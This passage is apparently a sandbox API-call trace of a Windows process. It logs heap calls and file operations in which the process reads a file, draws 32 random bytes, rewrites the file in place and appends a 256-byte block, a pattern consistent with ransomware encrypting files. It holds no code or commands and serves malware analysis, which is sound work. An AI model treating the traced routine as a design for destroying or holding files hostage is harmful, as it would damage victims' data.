returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.205] GetProcessHeap () returned 0x4f10000 [0083.205] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.206] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.207] GetProcessHeap () returned 0x4f10000 [0083.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.208] GetProcessHeap () returned 0x4f10000 [0083.208] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.209] GetProcessHeap () returned 0x4f10000 [0083.209] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.209] GetProcessHeap () returned 0x4f10000 [0083.209] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.209] GetProcessHeap () returned 0x4f10000 [0083.209] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.209] GetProcessHeap () returned 0x4f10000 [0083.209] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.210] GetProcessHeap () returned 0x4f10000 [0083.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.210] SetFilePointerEx (in: hFile=0x8f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.210] WriteFile (in: hFile=0x8f8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.211] WriteFile (in: hFile=0x8f8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.211] GetProcessHeap () returned 0x4f10000 [0083.211] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.211] GetProcessHeap () returned 0x4f10000 [0083.211] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.211] GetProcessHeap () returned 0x4f10000 [0083.211] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.211] CloseHandle (hObject=0x8f8) returned 1 [0083.212] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 102 [0083.212] SetFilePointerEx (in: hFile=0x918, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.212] ReadFile (in: hFile=0x918, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0083.212] SetFilePointerEx (in: hFile=0x918, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.212] GetProcessHeap () returned 0x4f10000 [0083.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.212] GetProcessHeap () returned 0x4f10000 [0083.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.212] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.212] GetProcessHeap () returned 0x4f10000 [0083.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0083.212] ReadFile (in: hFile=0x918, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x85, lpOverlapped=0x0) returned 1 [0083.215] SetFilePointerEx (in: hFile=0x918, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.215] WriteFile (in: hFile=0x918, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x85, lpOverlapped=0x0) returned 1 [0083.215] GetProcessHeap () returned 0x4f10000 [0083.215] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.215] GetProcessHeap () returned 0x4f10000 [0083.215] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.215] GetProcessHeap () returned 0x4f10000 [0083.215] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.215] GetProcessHeap () returned 0x4f10000 [0083.215] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.215] GetProcessHeap () returned 0x4f10000 [0083.215] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.215] GetProcessHeap () returned 0x4f10000 [0083.215] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.216] GetProcessHeap () returned 0x4f10000 [0083.216] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.217] GetProcessHeap () returned 0x4f10000 [0083.217] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.218] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.218] GetProcessHeap () returned 0x4f10000 [0083.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.219] GetProcessHeap () returned 0x4f10000 [0083.220] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.220] GetProcessHeap () returned 0x4f10000 [0083.220] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.220] SetFilePointerEx (in: hFile=0x918, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.220] WriteFile (in: hFile=0x918, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.220] WriteFile (in: hFile=0x918, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.220] GetProcessHeap () returned 0x4f10000 [0083.220] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.220] GetProcessHeap () returned 0x4f10000 [0083.220] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: 